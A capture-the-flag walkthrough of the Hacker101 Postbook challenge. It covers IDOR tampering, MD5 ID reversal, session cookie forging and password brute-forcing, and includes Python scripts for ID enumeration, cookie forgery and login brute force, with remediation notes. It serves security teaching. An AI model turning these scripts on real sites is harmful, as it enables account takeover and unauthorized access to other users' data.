Postbook is a beginner-friendly, easy-difficulty web CTF from the Hacker101 CTF platform.
This CTF contains seven hidden flags, and in this walkthrough I will guide you step by step through the process of uncovering each one.
So, click on the ‘start’ button and let’s find the first flag! (:
When entering the CTF, you’ll encounter a welcoming page offering sign-in and sign-up options:
Since I don’t have a user, I’ll create one and log in:
With access gained, I can now explore a variety of new features. I’ll test these functions to uncover anything of interest.
I’ll start with creating a new post:
I’ll use Burp Suite to intercept and modify my requests.
Burp Suite is a valuable tool for exploring and exploiting vulnerabilities in web applications. It allows for interception and manipulation of web traffic, enabling the discovery and exploitation of security weaknesses.
While examining the POST request, I identified a parameter that caught my attention:
This is interesting because the value of this parameter is predictable (a small sequential integer rather than a hash or a random token). Since my user_id is 3 and I’m the newest user, I’ll try changing the ‘user_id’ value to ‘1’ or ‘2’ and observe the responses.
In order to modify the request, I’ll send the request to Burp’s Repeater:
I’ll modify the ‘user_id’ value to ‘1’ and send it:
Captured the first flag! 🚩
1 / 7 🚩
Let’s move on to the second flag.
I noticed two existing posts:
After clicking on the link to the first post, I observed an interesting parameter in the URL:
Similar to the earlier parameter we encountered, the ‘id’ parameter in this case also appears to be predictable. Based on this observation, I’ll attempt to enumerate additional post IDs.
To do so, I’ll use Burp’s Intruder:
Analyzing the response lengths identified the valid post IDs: responses longer than 1500 bytes correspond to existing posts, while the shorter ones are the “not found” page. So, my next step is to access these posts by altering the ‘id’ value in the URL to each of the identified valid IDs.
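The same enumeration can be scripted instead of clicking through Intruder. The following is an added example and not code from the original walkthrough: it walks a range of candidate post IDs, fetches each view page, and reports the IDs whose response body exceeds the length threshold. The URL layout (`/index.php?page=view.php&id=<n>`), the cookie name, and the localhost base URL are assumptions for illustration; the `fetch` callable is injectable so the logic runs offline against a constructed stand-in for the target.

```python
"""Enumerate sequential post IDs and keep those whose page is 'large'.

Added example, not part of the original walkthrough. The view-page path,
the cookie name and BASE_URL are assumptions; confirm them in Burp first.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable

BASE_URL = "http://localhost:8000"                # assumed
VIEW_PATH = "/index.php?page=view.php&id={id}"    # assumed URL layout


def make_http_fetcher(base_url: str, session_cookie: str) -> Callable[[int], bytes]:
    """Return a function that downloads the view page for a given post id.

    Error pages (4xx/5xx) are returned as bodies too, so their length can be
    compared against the threshold just like a 200 response.
    """
    def fetch(post_id: int) -> bytes:
        req = urllib.request.Request(
            base_url + VIEW_PATH.format(id=post_id),
            headers={"Cookie": f"id={session_cookie}"},  # cookie name 'id' assumed
        )
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.read()
        except urllib.error.HTTPError as err:
            return err.read()
    return fetch


def enumerate_post_ids(candidates: Iterable[int],
                       fetch: Callable[[int], bytes],
                       threshold: int = 1500) -> Dict[int, int]:
    """Fetch every candidate id; return {id: body_length} for bodies above threshold.

    The threshold mirrors the Intruder observation in the walkthrough: real
    posts render a full page, missing ones render a short error page.
    """
    hits: Dict[int, int] = {}
    for post_id in candidates:
        length = len(fetch(post_id))
        if length > threshold:
            hits[post_id] = length
    return hits


# Constructed offline stand-in for the target: three existing posts (ids 1, 2
# and 945, matching the IDs found in the walkthrough) and a short "not found"
# page for everything else. Not real server responses.
_FAKE_POSTS = {
    1: b"<html><body><p>" + b"A" * 1600 + b"</p></body></html>",
    2: b"<html><body><p>" + b"B" * 1700 + b"</p></body></html>",
    945: b"<html><body><p>" + b"C" * 2000 + b"</p></body></html>",
}


def fake_fetch(post_id: int) -> bytes:
    return _FAKE_POSTS.get(post_id, b"<html><body>No such post</body></html>")


if __name__ == "__main__":
    # Against a live target:  fetch = make_http_fetcher(BASE_URL, "<your cookie value>")
    found = enumerate_post_ids(range(1, 1001), fake_fetch)
    for post_id, length in sorted(found.items()):
        print(f"id={post_id} length={length}")
```

Against a live target the only thing to swap is `fake_fetch` for `make_http_fetcher(...)`; everything else, including the length threshold, stays the same. If the application ever returned a uniformly sized page, response length would stop being a usable oracle and you would compare a status code or a marker string in the body instead.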
I’ll begin by exploring the post ID value ‘945’, as it appears to be the most interesting among the identified IDs:
Captured the second flag! 🚩
2 / 7 🚩🚩
Next, I’ll test the value ‘2’:
Captured the third flag! 🚩
3 / 7 🚩🚩🚩
Let’s move on to the next flag.
I observed two additional functions available — ‘edit’ and ‘delete’:
I’ll test the ‘edit’ function first:
The ‘id’ parameter appears to be a common element here as well, so maybe I can edit other users’ posts by altering the ‘id’ value to one of the post IDs I previously identified.
I’ll modify the ‘id’ value to ‘2’ and observe the response:
It worked!
I’ll edit and save the post:
Captured the fourth flag! 🚩
4 / 7 🚩🚩🚩🚩
Next, I’ll test the ‘delete’ function:
I observed that the GET request also includes the ‘id’ parameter, but here its value is not a plain number:
After a quick Google search of the value, I identified it as an MD5 hash.
MD5 is a one-way hash, so the value cannot be “decrypted” as such; but the hash of a short, predictable input such as a small integer is trivially reversed with a precomputed lookup table, which is exactly what the online MD5 lookup sites do. I’ll look it up on one of them.
The ‘id’ value is 4!
I’ll MD5-hash the number ‘2’ and substitute the digest into the GET request:
Captured the fifth flag! 🚩
5 / 7 🚩🚩🚩🚩🚩
Let’s move on to the next flag.
I observed that every request also carries a cookie named ‘id’, and its value is again an MD5 hash:
The cookie’s ‘id’ value is identical to the one I encountered in the delete request, so this value is also ‘4’.
I’ll MD5-hash the number ‘1’ and replace the cookie’s ‘id’ value with the digest:
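Both the delete ‘id’ parameter and the session cookie above are protected only by MD5 of a small integer, and a hash without a secret is not an access control. The following is an added example, not code from the original walkthrough, that builds the same kind of lookup table the online MD5 sites rely on, reverses a captured digest, and then forges the ‘id’ cookie for an arbitrary user. The cookie name ‘id’ comes from the walkthrough; the table size and the `Cookie` header format are assumptions for illustration.

```python
"""Reverse unsalted MD5 of small integers and forge the 'id' cookie.

Added example, not part of the original walkthrough. Demonstrates why
md5(user_id) is no protection: the input space is tiny and enumerable.
"""
import hashlib
from typing import Dict, Optional


def md5_hex(value: str) -> str:
    """Hex MD5 digest of a string, the way the application appears to derive its ids."""
    return hashlib.md5(value.encode()).hexdigest()


def build_lookup(limit: int = 100_000) -> Dict[str, str]:
    """Precompute md5(n) for every integer below `limit`.

    This is a miniature version of the precomputed tables behind the MD5
    lookup websites; it takes a fraction of a second for this input space.
    """
    return {md5_hex(str(n)): str(n) for n in range(limit)}


def reverse_md5_id(digest: str, table: Dict[str, str]) -> Optional[str]:
    """Return the integer (as a string) whose MD5 is `digest`, or None if not in the table."""
    return table.get(digest.strip().lower())


def forge_cookie(user_id: int) -> str:
    """Cookie header value impersonating `user_id` (cookie name 'id' as seen in the walkthrough)."""
    return f"id={md5_hex(str(user_id))}"


def delete_param(post_id: int) -> str:
    """Query-string fragment for the delete request's hashed 'id' parameter."""
    return f"id={md5_hex(str(post_id))}"


if __name__ == "__main__":
    table = build_lookup()
    captured = "a87ff679a2f3e71d9181a67b7542122c"   # md5("4"), as captured from the cookie
    print("captured cookie id ->", reverse_md5_id(captured, table))
    print("Cookie:", forge_cookie(1))
    print("delete request:", delete_param(2))
```

The fix on the application side is not a stronger hash but a server-side check that the authenticated user actually owns the post being deleted, and a session identifier that is a random token the server maps to a user, not a function of the user ID.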
We’ve successfully captured the sixth flag! Only one final flag remains to be found! 🚩
6 / 7 🚩🚩🚩🚩🚩🚩
Let’s move on to the last flag! (:
I observed that there is a user called ‘user’ on the website:
I’ll attempt to brute-force the password for the ‘user’ account using Burp Suite’s Intruder:
After analyzing the status codes, I’ve determined that the password for the ‘user’ account is ‘password’. The password is not case-sensitive, meaning variations like ‘Password’ and ‘PASSWORD’ are also valid.
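The Intruder run above can be reproduced with a short script. The following is an added example and not code from the original walkthrough: it submits each candidate password for a username, disables redirect following so a login redirect is visible as its own status code, and stops at the first candidate whose status matches the success signature. The login path, the form field names (`username`, `password`) and the assumption that success is a 302 while failure re-renders the form with a 200 are illustrative assumptions; confirm the real differentiator in Burp before relying on it. The `attempt` callable is injectable so the logic runs offline against a constructed stand-in.

```python
"""Status-code-driven password brute force for a single account.

Added example, not part of the original walkthrough. Path, field names
and the success status code are assumptions to verify against the target.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

LOGIN_PATH = "/index.php?page=sign_in.php"   # assumed


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so a 302 surfaces as an HTTPError we can read."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def make_http_attempt(base_url: str) -> Callable[[str, str], int]:
    """Return a function that POSTs one credential pair and yields the raw status code."""
    opener = urllib.request.build_opener(_NoRedirect())

    def attempt(username: str, password: str) -> int:
        body = urllib.parse.urlencode(
            {"username": username, "password": password}  # field names assumed
        ).encode()
        req = urllib.request.Request(base_url + LOGIN_PATH, data=body, method="POST")
        try:
            with opener.open(req, timeout=10) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code          # 302 on success lands here because redirects are disabled
    return attempt


def brute_force(username: str,
                candidates: Iterable[str],
                attempt: Callable[[str, str], int],
                success_codes: Tuple[int, ...] = (302,)) -> Optional[str]:
    """Return the first candidate whose login response status is in `success_codes`."""
    for password in candidates:
        if attempt(username, password) in success_codes:
            return password
    return None


# Constructed offline stand-in for the target. It accepts 'password' in any
# case, mirroring the case-insensitive behaviour observed in the walkthrough,
# and answers 302 on success and 200 on failure. Not a real server.
def fake_attempt(username: str, password: str) -> int:
    return 302 if username == "user" and password.lower() == "password" else 200


# Constructed wordlist; in practice feed a real list such as a SecLists file.
WORDLIST = ["123456", "letmein", "qwerty", "Password", "admin", "password"]


if __name__ == "__main__":
    # Against a live target:  attempt = make_http_attempt("http://localhost:8000")
    print("found:", brute_force("user", WORDLIST, fake_attempt))
```

Because the stand-in compares passwords case-insensitively, the first hit in the constructed list is ‘Password’ rather than ‘password’; that is the same effect the walkthrough reports when it notes that ‘Password’ and ‘PASSWORD’ are also accepted. The absence of any rate limiting or lockout is what makes this attack practical against the target, and it is the first thing to flag in a report alongside the IDORs.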
With the ‘user’ account password now known, I’ll proceed to log into the user’s account.
Success! Captured the seventh and final flag! 🚩
7 / 7 🚩🚩🚩🚩🚩🚩🚩
Thank you for taking the time to read this walkthrough, and I hope that it has been informative and valuable to you.
Happy hacking! 🖤